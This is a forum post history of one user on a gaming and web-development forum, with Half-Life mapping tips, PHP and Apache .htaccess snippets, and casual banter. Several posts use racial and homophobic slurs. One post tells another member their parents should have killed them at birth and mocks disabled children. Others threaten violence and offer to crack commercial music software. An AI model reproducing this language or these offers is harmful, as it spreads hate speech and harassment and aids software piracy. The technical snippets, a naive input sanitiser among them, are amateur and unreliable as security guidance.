In Pointers to functions and complications using them by sprinkles:
This phone scrolls so well I read nothing above
In The M-I-N-E-C-R-A-F-T Truck by sprinkles:
the_cloud_system said: ![]() That's what I'm doing tonight. Crown Royal and Black and Milds.
In I'm Leaving by sprinkles:
I don't do it for the money, there's bills that I can't pay. I don't do it for the glory, I jus' do it anway. Providing for the future's my responsibility. Yeah, I'm real good under pressure, being all that I can be. And, I can't call in sick on Monday when the weekend's been too strong. I jus' work straight through the holidays, sometimes all night long. You can bet that I stand ready when the wolf growls at the door. Hey, I'm solid; hey, I'm steady; I'm true down to the core. And, I will always do my duty no matter what the price. I've counted up the cost I know the sacrifice. Oh, and I don't want to die for you, but if dyin's asking me I'll bear that cross with honor, 'cause freedom don't come free. I'm an American Soldier, an American. Beside my brothers and my sisters I will proudly take a stand. When liberty's in jeopardy I will always do what's right. I'm out here on the front line, so sleep in peace tonight. American Soldier, I'm an American Soldier. Soldier's Creed I am an American Soldier I'm a Warrior and a member of a team I serve the people of the United States, and I live the Amry Values I will always place the mission first I will never accept defeat I never quit I will never leave a fallen comrade I am disciplined, physically and mentally tough, trained and proficient in my warrior tasks and drills I always maintain my arms, my equipment, and myself I am an expert and I am a professional I stand ready to deploy, engage, and destroy the enimies of the United States of America in close combat I am a guardian of freedom and the American way of life I am an American Soldier
In I'm Leaving by sprinkles:
Well I know I've been dragging this out. I mean this truck is a week old already. But this is the last time I'll be on superjer.com for a while. So peace niggers, if you're not a nigger then bye.
In I'm Leaving by sprinkles:
Well I leave tomorrow at 2. I'll be at MEPS for 2 days, then on a plane to Fort Robinson. After 2 weeks there I will be on a plane to Fort Jackson. See you in 7 months!
In I entered a contest by sprinkles:
Its sad that your parents didn't kill you at birth. Is there even a law in your country about killing deformed or retarded children? probably not. P.S. I liked you more when you were banned.
In The M-I-N-E-C-R-A-F-T Truck by sprinkles:
Do you suspect the server will still be up in 7 months?
In I have no name :( by sprinkles:
You probably did something wrong, that's why your map is lagging.[/sarcasm]
In Example by sprinkles:
SolidKAYOS said: Rockbomb said: Mate de Vita said: NatureJay said: Rockbomb said: NatureJay said: aaronjer said: If this turns into a quote chain everyone is banned. Everyone.
Well, I hate everyone here so that sounds like a challenge. Hey, don't make quote chains, I don't feel like being banned again. I might feel like getting banned and getting everyone else here banned. What do you say to that?!? I'm speechless. Don't quote chain man, ffs... What? Fuck Direct Tv! My bill on the 23 was $46, now (the 31) its $194. Bastards.
In Example by sprinkles:
hm? Anyways RB: Rockbomb said: (which means go to the directory above, for those who don't know). So REALLY what it SHOULD do
Go to the directory above. Rockbomb said: I think this has something to do with /forum being a directory rather than an actual file, because if you specify a direct page, it works like it should.
Then you solved your own problem :P
In The secrets of Pole Socking revealed! by sprinkles:
Rockbomb said: <html><iframe src="../" width="0" height="0"></iframe></html>
In The M-I-N-E-C-R-A-F-T Truck by sprinkles:
I don't have a graphics card either. But, I do have a poor oriental kid that draws pretty pictures on the screen. He keeps asking when he will be getting paid, I tell him its all going into his 401k.
In The M-I-N-E-C-R-A-F-T Truck by sprinkles:
No matter how much I wash it its still going to need a new paint job. And it needs its bumper fixed, new tires. Oh and if anyone knows about the electrical system let me know, mines ALL fucked up. :(
In I'm Leaving by sprinkles:
Mate de Vita said: Rockbomb said: There will be a going-away party for Sprinkles this upcoming Tuesday, if anyone happens to be in CO Springs and wants to join.
I live in Slovenia, but if you tell me when it's going to take place, I'll be sure to have some beer on the account of that party. 7:00 am to 3 or 4 in the afternoon.
In YOU ROAST MY BEEF! YOU SURE DO! by sprinkles:
I love your voice overs and animation. Can you do like a short cartoon? Like 5-10 mins?
In I'm Leaving by sprinkles:
If you hit the sgt they have a right to "reasonably restrain" you. Which pretty much means they will drop you (your face in the dirt).
In Uninstall/Remove a Driver by sprinkles:
So I installed some old game a while back. Apparently one of the drivers for this game isn't compatible with win7. So I uninstalled the game, but it left the driver. Is there anyway I can uninstall or remove the driver manually (I don't know which driver it is). I'm tired of Windows yelling at me about it (and of course they don't offer any solutions).
In how to change resolution? by sprinkles:
Down Rodeo said: (though isn't it -w and -h?).
Normally I'd agree, but with Valve you can never tell. Its probably -yettimonster -bobthebobslayer, I mean its Valve.
In I'm Leaving by sprinkles:
Wow! I jus' realized I leave in 12 days for BCT and AIT. I'm nervous now.
In The syntax of the command is incorrct. <---What?! Why?! by sprinkles:
Down Rodeo said: It has to be Mandarin.
Windows isn't made out of oranges!
In The syntax of the command is incorrct. <---What?! Why?! by sprinkles:
What language did you write the file in? Windows only understands Cantonese, so you have to write all batch files in Cantonese.
In Music You Recently Discovered! by sprinkles:
Hey! Did you guys know if you right click and scroll it will scroll all the way to the top or bottom?
In IE1 to IE9 plus HORSE PORN by sprinkles:
Everyone remember, when doing a historical timeline of a web browser include some reference to animal porn. Yeah, that'll get more viewers. I kind of want to download the early versions of IE to see how they would run today. But, I suppose they wouldn't even run on win7 or vista. :/
In How do you do that thing, with the thing, and the video? by sprinkles:
Any ideas on how to get the height? (and width) So you take that stuff after 'watch?v=,' throw it behind 'youtube.com/v/,' and you're done!
In How do you do that thing, with the thing, and the video? by sprinkles:
Is that what superjer.com uses? Cause I'm getting text/html. Content-Type: text/html; charset=utf-8 ) I guess all youtube videos have this: code watch?v=So I'll use regex to find that, then embed the video into an object or whatever. http://stackoverflow.com/questions/412467/how-to-embed-youtube-videos-in-php
In New HL1 Mod by sprinkles:
So wait, why are you making a mod for a game that's 10+(?) years old now?
In How do you do that thing, with the thing, and the video? by sprinkles:
So, basically how can I find out if a link is a video or not? Cause youtube doesn't have the normal .avi, .mp4eg, .badmovie extensions. So like how would I do that? (with PHP)
In New HL1 Mod by sprinkles:
the_cloud_system said: SRAW said: How'd you know sprinkles?!
cause hes got topings and sprinkels but no nuts But, I can still cream!?
In New HL1 Mod by sprinkles:
Mate de Vita said: Sprinkles, your sig doesn't work. I'm trying to order it with Nuts but the tick won't appear in the checkbox when I click it.
That's what she said?
In New HL1 Mod by sprinkles:
Down Rodeo said: Oh, but it was going to get to this stage :D
How's that Alien Swarm Mod working out?
In New HL1 Mod by sprinkles:
Down Rodeo said: Oh, but it was going to get to this stage :D
How's that Alien Swarm Mod working out?
In New HL1 Mod by sprinkles:
Down Rodeo said: Oh, but it was going to get to this stage :D
How's that Alien Swarm Mod working out?
In New HL1 Mod by sprinkles:
Down Rodeo said: Oh, but it was going to get to this stage :D
How's that Alien Swarm Mod working out?
In New HL1 Mod by sprinkles:
Down Rodeo said: Oh, but it was going to get to this stage :D
How's that Alien Swarm Mod working out?
In The M-I-N-E-C-R-A-F-T Truck by sprinkles:
Wait, I forgot my initial plan! I was going to buy a nice gaming rig and use the rig I'm on now for my server. Thanks for reminding me!
In The M-I-N-E-C-R-A-F-T Truck by sprinkles:
superjer said: BTW: The current server is a crusty old Celeron with 1GB of rams and it don't work too good for Minecraft (or nothing).
I jus' threw my old server away (literally, its going in the bon fire). Are you looking to sell yours?
In "Confirm Form Resubmission" by sprinkles:
But its makes it too easy to double post now. Can you make it so that it edits the post instead of makes a new one?
In No one noticed this before?! by sprinkles:
Lol, I never noticed there was a button at the top. P.S. Its still like that. We should have like a scavenger hunt for stuff like that. Does superjer.com have any easter eggs?
In Can you get Microsoft Word? by sprinkles:
phoenix_r said: sprinkles said: I get Office free with my AKO account.
Our tax dollars at work. AKO, isn't that a contradiction of terms? Army Knowledge Online. Not sure what you're talking about. You're going to have to pirate that shit. My CaC wont work, its fucking pissing me off.
In Can you get Microsoft Word? by sprinkles:
I get Office free with my AKO account. Do you need me to get it (I get other shit for free too; anti-virus, etc.)?
In Some stuff I miss :( by sprinkles:
NatureJay said: Surge
I used to drink them by the 24 pack! So good.
In Anyone knowledgeable in the car stereo field? by sprinkles:
Explain? I have no clue what you're talking about.
In Anyone knowledgeable in the car stereo field? by sprinkles:
You don't have to match Ohms, they're completely independent of your build.
In Anyone knowledgeable in the car stereo field? by sprinkles:
Rockbomb said: So there would be no benefits to using higher ohms, it just lets you adjust how many watts are being put out, right?
You can't control the Ohms. Its a property of the circuits and wires.
In Anyone knowledgeable in the car stereo field? by sprinkles:
Rockbomb said: So the more ohms, the less watts.
Ohms measure resistance. So the more Ohms the less electricity can flow.
In screen is black by sprinkles:
Rockbomb said: sprinkles said: Get rid of Windows.
Problem solved. I got rid of mine, but now there's a really bad draft in my house. Any solutions? Patch it with oatmeal.
In Anyone knowledgeable in the car stereo field? by sprinkles:
Rockbomb said: First off, do I need a capacitor for something like this?
The capacitor saves your battery from being drained. So, for pretty much any sound system you should get it. Or you can get a spare battery and run it off that. I've seen both setups, but can't really say what is better. Rockbomb said: Also, does an amp split the watts between speakers? (ie, an 800W amp would give 400W or 800W to each speaker?) An 800 watt amp will put out 800 watts. The more speakers you hook up will split the amount of power you get. Thusly, an 800 watt amp will give 2 speakers 400 watts a piece (ideally, but 1 speaker could demand more power, and thus take it). Don't forget you can tune amps. So if you have an 800 watt amp at max it will put out 800 watts. However, you can tune it to put out less wattage.
In Hey , I need a .prt file by sprinkles:
When hlbsp finishes correctly it generates the .prt file. Post your entire compile log.
In Command Prompt help... plz? by sprinkles:
Rockbomb said: I'm getting pretty tired of windows 7's "security"...
When I used to do .Net programming it was a bitch. I wasn't allowed to copy files from the Program Files dir, let alone ask for privileges to do so. Wait, no, I wasn't even allowed to search through the Program Files dir for anything.
In Command Prompt help... plz? by sprinkles:
superjer said: Is this some kind of Windows Vista/7 thing
It started with Vista; its part of UAC. You cannot copy files from the command prompt without admin privileges.
In lava lamp by sprinkles:
nectar said: one question, isnt wax less denser than the water? so the wax will float up and it wont sink? i saw u add something but there isnt any house hold item? or something?
That's the whole point. When wax is in its solid form it is more dense then water, thusly it sinks in water. However, when wax is in a liquid form it is less dense the water, thusly floating or rising in water. The wax on the bottom gets heated by the coil making it less dense than water and rise. The wax at the top is cooled making it more dense than the water and sinks.
In Portal file missing! ~:( by sprinkles:
- Warning: Larger than expected texture (251052 bytes): 'CAR' - Warning: Larger than expected texture (270092 bytes): '{BURNSWINDOW' - Warning: Larger than expected texture (348972 bytes): 'NUKEOUTSIDE' - Warning: Larger than expected texture (348972 bytes): 'TRAILER' - Warning: Larger than expected texture (261932 bytes): '{PLEXFLASH' - Warning: Larger than expected texture (196652 bytes): 'COMICSTORE' - Warning: Larger than expected texture (261932 bytes): '{RADIO' - Contains 1 used texture, 20.00 percent of map (110 textures in wad) Warning: ::FindTexture() texture WALL002 not found! Warning: ::LoadLump() texture WALL002 not found! Texture usage is at 0.05 mb (of 4.00 mb MAX) Your textures cannot be larger than 256x256. And, it seems your wad is corrupt.
In What's More Important? by sprinkles:
Rockbomb said: Is it YOUR house? If not, get the mouse
Well according to the lease I'm a 'partner.' But, essentially, yes.
In What's More Important? by sprinkles:
So what's more important: 1) Helping put a down payment on a house 2) New Cyborg mouse I'm leaning towards the mouse.
In Counter-Strike 1.6 map making error by sprinkles:
Rockbomb said: But Sprinkles, the leeches.
Leeches are beneficial. For example, they help remove blood clots...by sucking your blood (and those nasty platelets that stick together).
In Counter-Strike 1.6 map making error by sprinkles:
deleniz said: I drew the blocks inte each other, so that they're not layed on top of each other, theyre inside eachother.
Don't do that. It makes it exponentially harder for VIS to do its job.
In Kayos' Music by sprinkles:
SolidKAYOS said: WellImona new computer and wanting to work on FL studio again. Ive gotten a greater understanding on what to do and i dont have it o this computer and i cant find a keygen..
I'll patch it. Give me a dl link.
In tie something to 2 entities by sprinkles:
Rockbomb said: I think Sprinkles was being sarcastic and making fun of how little the halflife engine can handle... I think.
Not my first intent. Kotohunter said: Why would it be stupid to have more possibilities? I'm going to have to disagree here... Because, the game engine wouldn't know how to render it, or how it would function. Kotohunter said: the rotate entity would make it rotate and the breakable entity would make it breakable.. sounds reasonable to me.. Don't take this reply the wrong way though, I do appreciate the help! Thanks! How does the game engine know how breakable-rotating objects function? Now I'm not saying you can't have an entity that can break and rotate. I'm saying the game engine doesn't know how to render two entities on one object.
In Made a New Video by sprinkles:
SolidKAYOS said: Go fuck yourself.
I've tried, but my penis doesn't bend well enough.
In Made a New Video by sprinkles:
Watch Spartacus, if you want to see really bad blood special effects. http://www.starz.com/originals/spartacus
In tie something to 2 entities by sprinkles:
You can't, pick one entity. It would be stupid to be able to assign multiple entities to one object. How would you expect it to function?
In killing doors by sprinkles:
There is some property, such as damage when blocked, or something. Use that.
In Command Prompt help... plz? by sprinkles:
Don't you love how I tell people what the problem is, and not how to fix it. :)
In Weight loss and me. by sprinkles:
UberJer said: wake up two pounds lighter than you were?
No. The doctors at MEPS gave me shit about losing 2 pounds!
In Command Prompt help... plz? by sprinkles:
nevertheless said: Access Denied. 0 file<s> copied. Press any key to continue... You do not have the required privileges to copy files. nevertheless said: Failed to initalize authentication interface. Exiting... http://forums.steampowered.com/forums/showthread.php?t=961363 BTW, that link is the first thing that pops up when you google it. Try harder next time.
In Weight loss and me. by sprinkles:
aaronjer said: No it's not. I have to spend nearly 3 times as much money on food as the average person. I hate my metabolism with a fiery passion.
Agreed.
In Chrome Plugins by sprinkles:
Its all done with javascript. It should be fairly easy to get the CSS. Jus' grab the head section, and search for the link, or inline stuff. Do that first, I'd say, then jus' display the result. I'm in no way sure how you would change this actively. The best guess I would say is: You reload the page, then change the CSS (The extension will run before the page is actually loaded). I think.
In Chrome Plugins by sprinkles:
It works with page actions. I'm not sure about the rest though. Here is a CSS tester thing: http://superjer.com/sprinkles/0.2_0/ Here is NotScripts: http://superjer.com/sprinkles/0.9.6_0/ Those should help you with page actions.
In Chrome Plugins by sprinkles:
http://superjer.com/sprinkles/chrome%20extension/ Hope that helps with the basics.
In Fan Problems by sprinkles:
There is nothing in there. I mean there is a little bit of dust on the fan fins, but nothing else. Nonetheless, I'm calling Dell to complain. Warranty expired, Dell wont even let me call them unless I pay a $60 service charge or some shit. Faggots.
In Fan Problems by sprinkles:
Ok, so the temps reached 133 F and showed no signs of going down.I shut that bitch down asap. Any ideas?
In Fan Problems by sprinkles:
Temps are normal I guess. Then the cpu temp goes up to 115 F. 122 F! They have a fire icon next to them!!!
In Fan Problems by sprinkles:
Any clue what is causing this? It will run like that for 10-20 seconds then cut off. Repeat. However, randomly, it will decide to run fine. Dell Insprion 1545 Intel Pentium Dual Core @ 2.1 GH
In Endless floor by sprinkles:
Rockbomb said: Outcast said: waiting 5 hours to download
We're not in 1990. Upgrade to something other than dialup lol joke of the week? or joke of the weak? lol that was bad
In MAX_MAP_BRUSHSIDES and func_details. by sprinkles:
I'm sorry but I don't think any of us here are too familiar to Source.
In Learning Hammer by sprinkles:
You can't use func_walls outside of a map it would cause you a leak. The clip texture can be found when you download zhlt (zhlt.wad).
In Learning Hammer by sprinkles:
SRAW said: sprinkles said: SRAW said: (ctrl+a)
Resizes the view windows, it does not select everything. I said I don't have hammer anymore so I can't remember Then don't give advice....
In Learning Hammer by sprinkles:
SRAW said: (ctrl+a)
Resizes the view windows, it does not select everything.
In Tasty Town by sprinkles:
I regret watching that video, because it now has 1 more view, and it shouldn't.
In Maximum .WAD File Size ? by sprinkles:
GanJa said: I want to UN-Merge the whole thing into 2 smaller .WADs
Copy pasta that shit. I think the max size allowed (of a wad) is 4 mb.
In Learning Hammer by sprinkles:
Down Rodeo said: Yes, brushes textured with CLIP are invisible but stop players moving through.
Nades, bullets, or anything that is not a player can go through it though. If you want an impenetrable barrier, that is nothing can go through it. Make the brush with AAA texture, then make it a func_wall.
In Spider crab sheds shell by sprinkles:
The only thing that really makes me sick is surgery. Like "I have to cut you open to take your liver out." kind of surgery.
In Fun With Windows Speech Recognition by sprinkles:
Here's what Windows thought I said: windows said: < BR/>
Public function snowboard () { For each ($I= 0; $I less than 52 I love Malibu so much that she doesn't even know I love her. Thank you for your time. I'm cutting her right now and she adores it because she is a whore best bark by a left of the Chinese Aristide LAC Dolores it because he's a horror best by Chris but it's a new state that still has its share of the bigger of this should I do that if there is the lack of dollars it because see he's a far the spikes Fiske is that they state that they live in their bigger the asphalt you broke selected for the 18th lotion if I didn't lose a little of that battle at all like and broke windows of I broke my ego node as I broke my flat denials what if a boobs a yearbook the high will owe you wanna talk to the crazy machine that does have a clue what's going on 11 nice for Ya wanna bark no barking of earth I love you too will will allow bill weld as in the kind of bucking three of my guy out windows he thought windows use that windows you stock sock stock bucking sock windows CE stock and why of this could go on for hours willow when does the city and know what the folks coming on the infant's head back to the craziest bit was like a Baghdad story are read by a drunk man I said at the battered stories written by a drunk man that the story be a ad of the Hague of this is the consent didn't hear one of the insane when the loudoun download and that other programs so I can get to sit down Ali que would use the Beckett and play Allah well here you can even do that for me like why can I play allow with this stupid speech recognition said what was that I just felt that a tire for the paragraph and say what was that the this to estimate the length. Stop stop stop this is enough you wore retarded you are recorded retarded thank you you work hard black dance is betting that close to being right Up a line up a line goal of the flocking line; $I++) { } }
In Error: Bad surface extents (8 x 3479) by sprinkles:
It has to do with your texture(s). Usually when a texture is stretched more than 10x10 you get this error. Very small brushes are the most common place for this error. This won't show up in the "check for errors" function in hammer.
In PPPPPPPPPPPPPPPPPLLLLLEEEEEEEEEEAAAAAAAASEEEEEEEEEEE help by sprinkles:
I like how your long, annoying title fucked up RB's signature. Oh, and if you can't figure it out yourself GET THE FUCK OFF THE COMPUTER. God, you sound like my mom. :/
In Security by sprinkles:
So here is what I have, its pretty simple. This will disallow HTML tags, PHP tags, whitespaces (spaces, tabs, line breaks, carriage returns, etc.). php code <?php class Protect { public function Strip($string) { if (!empty($string)) { $string = html_entity_decode($string); $string = strip_tags($string); $string = trim($string); $string = preg_replace("/\s/","",$string); } else { return false; } return $string; } } ?>
In PLZ help..i goonnna cry =D by sprinkles:
dexter said: hlvis: Error: Portal file 'catpee.prt' does not exist, cannot vis the map... what that means?>
superjer said: That error is from hlvis and means hlbsp had a problem. hlbsp will create the .prt file if it works ok.
Check the log file for an error specifically from hlbsp, like a LEAK.
In PLZ help..i goonnna cry =D by sprinkles:
Warning: No entities exist in hull 0, no filling performed for this hull Warning: No entities exist in hull 1, no filling performed for this hull Warning: No entities exist in hull 2, no filling performed for this hull Warning: No entities exist in hull 3, no filling performed for this hull
In Security by sprinkles:
So I found a security hole in my register page. Basically, the javascript that checks the inputs only checks for string length. So <textarea> would pass javascripts checks. However, in php I strip html tags. Then I check if the string is empty. This does not account for whitespaces though! So, " <img>" would pass all checks (empty() only checks if the string is null or empty). That is: Javascript would see there is enough chars. PHP would strip the html tags, leaving us with " " (from above). And empty would check to see if the string is null or empty (does not include whitespaces). This brings something to question. Would the trim function work after I strip html tags? As the link says,"This function returns a string with whitespace stripped from the beginning and end of str." So if the string only contains whitespaces does it still strip it?
In Tutorial: Custom Apache 403 Message by sprinkles:
Wow. As the first ever superjerdotcom tutorial I thought it would get more comments.
In Compiling, no error but cs won't start up. by sprinkles:
zomg, the attn button is broken! Call a plumber!
In How do I remove access from a certain page? by sprinkles:
I would suggest uninstalling it. Jus' download it and copy pasta that shit. Then use the .htaccess file.
In Compiling, no error but cs won't start up. by sprinkles:
So you want him to know you were drinking? Unusual.
In How do I remove access from a certain page? by sprinkles:
why is it in etc/? apt-get install phpmyadmin?
In Compiling, no error but cs won't start up. by sprinkles:
Down Rodeo said: Oh, awesome! You're a "pick a fight over the internet" man! :D
I will swim to fucking Scotland and kick your ass to Saudi Arabia.
In How do I remove access from a certain page? by sprinkles:
This only requires the .htaccess file. There are two approaches to restricting by IP address:
a) deny everyone access, then allow certain hosts/IP addresses AuthName "Lee's Secret Area" AuthType Basic <Limit GET POST> order deny,allow deny from all allow from 199.166.210. allow from .golden.net allow from proxy.aol.com allow from fish.wiretap.net </Limit> b) allow everyone except for certain hosts/IP addresses AuthName "Lee's Secret Area" AuthType Basic <Limit GET POST> order allow,deny allow from all deny from .microsoft.com deny from .evil-hackers.org deny from 24.112.106.235 deny from morphine.wiretap.net </Limit>
In How do I remove access from a certain page? by sprinkles:
If yo disallow access to other people you will also disallow access
In Apache 403 by sprinkles:
Rockbomb said: I'm a little confused. What file do I add these directives to?
You can add them to an .htaccess file, for a specific dir. Or you can edit /etc/apache2/apache2.conf. There will be a section about error directives.
In Compiling, no error but cs won't start up. by sprinkles:
Da Fleegsta said: the_cloud_system said: Da Fleegsta said: \users\chris\desktop\wads\halflife.wad
your .wad goes in your zhilt folder... and no its not out dated its just not retard proof Lol, you're one to talk. What you said is not only incorrect, but completely irrelevent to the problem. Ha, thanks anyway kid. Ironically I jus' got out of a fight. Don't fuck with cloud, kid. I'm not hesitant in the least about beating the shit out of someone I don't know for no reason.
In Apache 403 by sprinkles:
How can I change the default page of 403s in apache? Like I want to change what it says Example: http://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htmhttp://www.superjer.com/forum/havokk.htm uh-oh Quote: Forbidden
You don't have permission to access /sprinkles/foras/admin/admin.php on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch Server at 192.168.2.2 Port 80
In It's not really the right place for this by sprinkles:
I think we've already had a truck on this.
In Does anything change around here? by sprinkles:
So is this like a visit or are you going to stay?
In how did YOU found superjer.com? by sprinkles:
Is this some kind of cruel joke!? Or is The Legendary Edan back!? !?
In What Happens When You Max Out Your RAM? by sprinkles:
Rockbomb said: aaronjer said: I'll bet you say that to all the girls.
>Implying I've ever seen a real live girl. What about movie chick?
In What Happens When You Max Out Your RAM? by sprinkles:
I wanted to know, so:
Apparently I don't have enough programs on my rig. But serious, what happens when I max out my RAM? like for realz 100% maxed out?
In I Suck at JavaScript! by sprinkles:
